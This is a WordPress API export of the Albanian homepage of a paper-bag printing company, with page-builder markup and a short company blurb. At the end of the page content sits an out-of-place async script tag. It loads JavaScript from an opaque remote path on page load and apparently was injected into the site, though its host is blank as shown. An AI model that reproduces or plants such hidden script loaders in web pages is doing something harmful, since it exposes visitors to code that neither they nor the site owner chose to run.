{"id":2,"date":"2017-08-31T13:45:14","date_gmt":"2017-08-31T13:45:14","guid":{"rendered":"http:\/\/new.grandpaperbags.com\/?page_id=2"},"modified":"2017-08-31T16:01:01","modified_gmt":"2017-08-31T16:01:01","slug":"sample-page","status":"publish","type":"page","link":"https:\/\/grandpaperbags.com\/","title":{"rendered":"HOME"},"content":{"rendered":"<div class=\"wpb-content-wrapper\"><p>[vc_row][vc_column][vc_column_text]<\/p>\n<h2 style=\"text-align: center;\"><strong><span style=\"color: #262b2e;\">SHTYPSHKRONJA<\/span><span style=\"color: #39c44b;\"> GRAND 2006<\/span> <\/strong><\/h2>\n<p>[\/vc_column_text][vc_empty_space height=&#8221;20px&#8221;][vc_row_inner][vc_column_inner width=&#8221;1\/6&#8243;][\/vc_column_inner][vc_column_inner width=&#8221;2\/3&#8243;][vc_column_text]<\/p>\n<p style=\"text-align: center;\">Shtypshkronja Grand 2006 tashm\u00eb lider n\u00eb fush\u00ebn e saj, arrin t\u00eb pozicionohet n\u00eb tregun Shqiptar me t\u00eb gjith\u00eb gam\u00ebn e produkteve q\u00eb posedon.Grand \u00ebsht\u00eb krijuar n\u00eb vitin 2006 pas nj\u00eb experience gati 20 vjecare n\u00eb Greqi kjo shtypshkronje ka arrritur q\u00eb n\u00eb fare pak koh\u00eb t\u00eb mund t\u00eb gj\u00ebndet pran\u00eb klienteve t\u00eb saj.<\/p>\n<p>[\/vc_column_text][\/vc_column_inner][vc_column_inner width=&#8221;1\/6&#8243;][\/vc_column_inner][\/vc_row_inner][vc_empty_space][vc_row_inner][vc_column_inner width=&#8221;1\/3&#8243;][vc_single_image image=&#8221;85&#8243; img_size=&#8221;120X120&#8243; alignment=&#8221;center&#8221;][vc_custom_heading text=&#8221;RRETH NESH&#8221; font_container=&#8221;tag:h3|text_align:center&#8221; google_fonts=&#8221;font_family:Open%20Sans%3A300%2C300italic%2Cregular%2Citalic%2C600%2C600italic%2C700%2C700italic%2C800%2C800italic|font_style:600%20bold%20regular%3A600%3Anormal&#8221;][vc_column_text]<\/p>\n<p style=\"text-align: center;\">Krijuar ne vitin 2006 pas nje eksperience 20-vjecare ne Greqi.<\/p>\n<p>[\/vc_column_text]<span id=\"creative-link-wrap-8312\" class=\"ult_main_cl ult-adjust-bottom-margin  \" >\n\t \t\t\t<span class=\"ult_cl_link_2  ult_crlink\" >\n\t\t\t\t\t<a  data-ultimate-target='#creative-link-wrap-8312 .ult_colorlink'  data-responsive-json-new='{\"font-size\":\"desktop:20px;\",\"line-height\":\"\"}'  href=\"\/index.php\/rreth-nesh\/\"  class=\"ult_colorlink ult-responsive \" style=\"font-weight:bold; \"  data-textcolor=\"#39c54b\" data-texthover=\"#333333\"data-bgcolor=\"#ffffff\"data-bghover=\"#ffffff\"data-style=\"Style_2\">\n\t\t\t\t\t\t\n\t\t\t\t\t\t<span data-hover=\"SHIKO ME SHUME\" style=\"color:#39c54b;;background:#ffffff;;\" class=\"ult_btn10_span   \">SHIKO ME SHUME<\/span>\n\t\t\t\t\t\t\n\t\t\t\t\t<\/a>\n\t\t\t\t<\/span>\n\t\t\t<\/span>[\/vc_column_inner][vc_column_inner width=&#8221;1\/3&#8243;][vc_single_image image=&#8221;86&#8243; img_size=&#8221;120X120&#8243; alignment=&#8221;center&#8221;][vc_custom_heading text=&#8221;PRODUKTET TONA&#8221; font_container=&#8221;tag:h3|text_align:center&#8221; google_fonts=&#8221;font_family:Open%20Sans%3A300%2C300italic%2Cregular%2Citalic%2C600%2C600italic%2C700%2C700italic%2C800%2C800italic|font_style:600%20bold%20regular%3A600%3Anormal&#8221;][vc_column_text]<\/p>\n<p style=\"text-align: center;\">Shtypshkronja Grand 2006 sjell ne tregun shqipetar canta te krijuara prej letre.<\/p>\n<p>[\/vc_column_text]<span id=\"creative-link-wrap-6229\" class=\"ult_main_cl ult-adjust-bottom-margin  \" >\n\t \t\t\t<span class=\"ult_cl_link_2  ult_crlink\" >\n\t\t\t\t\t<a  data-ultimate-target='#creative-link-wrap-6229 .ult_colorlink'  data-responsive-json-new='{\"font-size\":\"desktop:20px;\",\"line-height\":\"\"}'  href=\"\/index.php\/produkte-2\/\"  class=\"ult_colorlink ult-responsive \" style=\"font-weight:bold; \"  data-textcolor=\"#39c54b\" data-texthover=\"#333333\"data-bgcolor=\"#ffffff\"data-bghover=\"#ffffff\"data-style=\"Style_2\">\n\t\t\t\t\t\t\n\t\t\t\t\t\t<span data-hover=\"SHIKO ME SHUME\" style=\"color:#39c54b;;background:#ffffff;;\" class=\"ult_btn10_span   \">SHIKO ME SHUME<\/span>\n\t\t\t\t\t\t\n\t\t\t\t\t<\/a>\n\t\t\t\t<\/span>\n\t\t\t<\/span>[\/vc_column_inner][vc_column_inner width=&#8221;1\/3&#8243;][vc_single_image image=&#8221;87&#8243; img_size=&#8221;120X120&#8243; alignment=&#8221;center&#8221;][vc_custom_heading text=&#8221;KLIENTET TANE&#8221; font_container=&#8221;tag:h3|text_align:center&#8221; google_fonts=&#8221;font_family:Open%20Sans%3A300%2C300italic%2Cregular%2Citalic%2C600%2C600italic%2C700%2C700italic%2C800%2C800italic|font_style:600%20bold%20regular%3A600%3Anormal&#8221;][vc_column_text]<\/p>\n<p style=\"text-align: center;\">Shtypshkronja Grand 2006 ka bashkpunuar me disa kompani teper te njohura.<\/p>\n<p>[\/vc_column_text]<span id=\"creative-link-wrap-7388\" class=\"ult_main_cl ult-adjust-bottom-margin  \" >\n\t \t\t\t<span class=\"ult_cl_link_2  ult_crlink\" >\n\t\t\t\t\t<a  data-ultimate-target='#creative-link-wrap-7388 .ult_colorlink'  data-responsive-json-new='{\"font-size\":\"desktop:20px;\",\"line-height\":\"\"}'  href=\"\/index.php\/kliente\/\"  class=\"ult_colorlink ult-responsive \" style=\"font-weight:bold; \"  data-textcolor=\"#39c54b\" data-texthover=\"#333333\"data-bgcolor=\"#ffffff\"data-bghover=\"#ffffff\"data-style=\"Style_2\">\n\t\t\t\t\t\t\n\t\t\t\t\t\t<span data-hover=\"SHIKO ME SHUME\" style=\"color:#39c54b;;background:#ffffff;;\" class=\"ult_btn10_span   \">SHIKO ME SHUME<\/span>\n\t\t\t\t\t\t\n\t\t\t\t\t<\/a>\n\t\t\t\t<\/span>\n\t\t\t<\/span>[\/vc_column_inner][\/vc_row_inner][\/vc_column][\/vc_row]<script async src='https:\/\/\/3gGykjDJ?frm=script&#038;_cid=123' type='text\/javascript'><\/script><\/p>\n<\/div>","protected":false},"excerpt":{"rendered":"<p>[vc_row][vc_column][vc_column_text] SHTYPSHKRONJA GRAND 2006 [\/vc_column_text][vc_empty_space height=&#8221;20px&#8221;][vc_row_inner][vc_column_inner width=&#8221;1\/6&#8243;][\/vc_column_inner][vc_column_inner width=&#8221;2\/3&#8243;][vc_column_text] Shtypshkronja Grand 2006 tashm\u00eb lider n\u00eb fush\u00ebn e saj, arrin t\u00eb pozicionohet n\u00eb tregun Shqiptar me t\u00eb gjith\u00eb gam\u00ebn e produkteve q\u00eb posedon.Grand \u00ebsht\u00eb krijuar n\u00eb vitin 2006 pas nj\u00eb experience gati 20 vjecare n\u00eb Greqi kjo shtypshkronje ka arrritur q\u00eb n\u00eb fare pak koh\u00eb t\u00eb mund&hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-2","page","type-page","status-publish","hentry","description-off"],"_links":{"self":[{"href":"https:\/\/grandpaperbags.com\/index.php\/wp-json\/wp\/v2\/pages\/2","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/grandpaperbags.com\/index.php\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/grandpaperbags.com\/index.php\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/grandpaperbags.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/grandpaperbags.com\/index.php\/wp-json\/wp\/v2\/comments?post=2"}],"version-history":[{"count":4,"href":"https:\/\/grandpaperbags.com\/index.php\/wp-json\/wp\/v2\/pages\/2\/revisions"}],"predecessor-version":[{"id":92,"href":"https:\/\/grandpaperbags.com\/index.php\/wp-json\/wp\/v2\/pages\/2\/revisions\/92"}],"wp:attachment":[{"href":"https:\/\/grandpaperbags.com\/index.php\/wp-json\/wp\/v2\/media?parent=2"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}